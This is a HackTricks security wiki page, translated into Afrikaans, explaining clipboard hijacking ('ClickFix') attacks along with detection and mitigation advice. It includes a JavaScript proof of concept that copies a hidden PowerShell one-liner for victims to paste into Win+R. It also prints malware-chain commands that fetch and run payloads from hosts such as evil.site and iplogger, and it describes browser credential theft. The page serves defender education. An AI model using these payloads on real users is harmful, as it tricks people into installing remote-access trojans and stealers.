Clipboard Hijacking (Pastejacking) Attacks
Reading time: 5 minutes
tip
Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die đŹ Discord groep of die telegram groep of volg ons op Twitter đŠ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
"Moet nooit iets plak wat jy nie self gekopieer het nie." â ou maar steeds geldige advies
Oorsig
Clipboard hijacking â ook bekend as pastejacking â misbruik die feit dat gebruikers gereeld opdragte kopieer en plak sonder om dit te ondersoek. 'n Kwaadwillige webblad (of enige JavaScript-ondersteunende konteks soos 'n Electron of Desktop-toepassing) plaas programmatig aanvaller-beheerde teks in die stelselskyfie. Slachtoffers word aangemoedig, normaalweg deur sorgvuldig saamgestelde sosiale ingenieursinstruksies, om Win + R (Hardeskyf dialoog), Win + X (Vinnoottoegang / PowerShell), of 'n terminale te open en die skyfie-inhoud te plak, wat onmiddellik arbitrĂȘre opdragte uitvoer.
Omdat geen lĂȘer afgelaai word en geen aanhangsel geopen word nie, omseil die tegniek die meeste e-pos en webinhoud sekuriteitsbeheermaatreĂ«ls wat aanhangsels, makros of direkte opdraguitvoering monitor. Die aanval is dus gewild in phishingveldtogte wat kommoditeits malware-families soos NetSupport RAT, Latrodectus loader of Lumma Stealer lewer.
JavaScript Bewys-van-Konsep
<!-- Any user interaction (click) is enough to grant clipboard write permission in modern browsers -->
<button id="fix" onclick="copyPayload()">Fix the error</button>
<script>
function copyPayload() {
const payload = `powershell -nop -w hidden -enc <BASE64-PS1>`; // hidden PowerShell one-liner
navigator.clipboard.writeText(payload)
.then(() => alert('Now press Win+R , paste and hit Enter to fix the problem.'));
}
</script>
Oudere veldtogte het document.execCommand('copy')
gebruik, nu rely op die asynchrone Clipboard API (navigator.clipboard.writeText
).
Die ClickFix / ClearFake Stroom
- Gebruiker besoek 'n typosquatted of gecompromitteerde webwerf (bv.
docusign.sa[.]com
) - Ingemengde ClearFake JavaScript roep 'n
unsecuredCopyToClipboard()
helper aan wat stilweg 'n Base64-gecodeerde PowerShell een-liner in die klembord stoor. - HTML instruksies sĂȘ vir die slagoffer: âDruk Win + R, plak die opdrag en druk Enter om die probleem op te los.â
powershell.exe
voer uit, wat 'n argief aflaai wat 'n wettige uitvoerbare lĂȘer plus 'n kwaadwillige DLL bevat (klassieke DLL sideloading).- Die loader dekripteer addisionele fases, injecteer shellcode en installeer volharding (bv. geskeduleerde taak) â uiteindelik die NetSupport RAT / Latrodectus / Lumma Stealer laat loop.
Voorbeeld NetSupport RAT Ketting
powershell -nop -w hidden -enc <Base64>
# â Decodes to:
Invoke-WebRequest -Uri https://evil.site/f.zip -OutFile %TEMP%\f.zip ;
Expand-Archive %TEMP%\f.zip -DestinationPath %TEMP%\f ;
%TEMP%\f\jp2launcher.exe # Sideloads msvcp140.dll
jp2launcher.exe
(legitieme Java WebStart) soek sy gids virmsvcp140.dll
.- Die kwaadwillige DLL los dinamies API's op met GetProcAddress, laai twee binaries (
data_3.bin
,data_4.bin
) af via curl.exe, dekripteer hulle met 'n rolende XOR-sleutel"https://google.com/"
, inspuit die finale shellcode en unzip client32.exe (NetSupport RAT) naC:\ProgramData\SecurityCheck_v1\
.
Latrodectus Loader
powershell -nop -enc <Base64> # Cloud Identificator: 2031
- Laai
la.txt
af met curl.exe - Voer die JScript aflaaier uit binne cscript.exe
- Verkry 'n MSI payload â laat
libcef.dll
val langs 'n gesertifiseerde toepassing â DLL sideloading â shellcode â Latrodectus.
Lumma Stealer via MSHTA
mshta https://iplogger.co/xxxx =+\\xxx
Die mshta oproep begin 'n verborge PowerShell-skrip wat PartyContinued.exe
aflaai, Boat.pst
(CAB) onttrek, AutoIt3.exe
herbou deur middel van extrac32
& lĂȘer-konsolidasie en laastens 'n .a3x
skrip uitvoer wat blaaiers se akrediteerbare inligting na sumeriavgv.digital
uitvoer.
Opsporing & Jag
Blou-spanne kan klembord, proses-skepping en registrasie telemetrie kombineer om pastejacking misbruik te identifiseer:
- Windows Registrasie:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
hou 'n geskiedenis van Win + R opdragte â soek na ongewone Base64 / obfuscated inskrywings. - Sekuriteit Gebeurtenis ID 4688 (Proses Skepping) waar
ParentImage
==explorer.exe
enNewProcessName
in {powershell.exe
,wscript.exe
,mshta.exe
,curl.exe
,cmd.exe
}. - Gebeurtenis ID 4663 vir lĂȘer skeppings onder
%LocalAppData%\Microsoft\Windows\WinX\
of tydelike vouers reg voor die verdagte 4688 gebeurtenis. - EDR klembord sensors (indien beskikbaar) â korreleer
Clipboard Write
onmiddellik gevolg deur 'n nuwe PowerShell proses.
Versagtings
- Blaaier verharding â deaktiveer klembord skryf-toegang (
dom.events.asyncClipboard.clipboardItem
ens.) of vereis 'n gebruikersgebaar. - Sekuriteitsbewustheid â leer gebruikers om te tik sensitiewe opdragte of om dit eers in 'n teksredigeerder te plak.
- PowerShell Beperkte Taalmodus / Uitvoeringsbeleid + Toepassingbeheer om arbitrĂȘre een-liners te blokkeer.
- Netwerkbeheer â blokkeer uitgaande versoeke na bekende pastejacking en malware C2 domeine.
Verwante Truuks
- Discord Uitnodiging Hijacking misbruik dikwels dieselfde ClickFix benadering nadat dit gebruikers na 'n kwaadwillige bediener gelok het:
Verwysings
tip
Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die đŹ Discord groep of die telegram groep of volg ons op Twitter đŠ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.